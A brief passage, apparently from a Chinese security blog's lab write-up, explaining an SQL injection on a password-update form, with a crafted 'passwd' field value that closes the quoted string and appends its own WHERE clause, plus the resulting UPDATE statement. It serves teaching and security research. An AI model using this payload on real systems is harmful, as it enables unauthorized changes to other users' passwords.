因为是UPDATE语句,所以最好还是把剩下的WHERE username=’admin’补上,不然可能所有人密码都变了。
所以可以构造的语句是:
uname=admin&passwd=211' WHERE username='admin' and 1=2#&submit=Submit
对应的SQL语句为
UPDATE users SET password = '211' WHERE username='admin' and 1=2#' WHERE username='admin'FROM :rickyhao.com | rickyhao.com
相关推荐: Pwnable.kr Level 1 Writeup
Pwnable.kr Level 1 Writeup Last updated:Mar.23, 2017 CST 23:47:23 Pwnable.kr Level 1 Writeup collision bof flag passcode random in…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论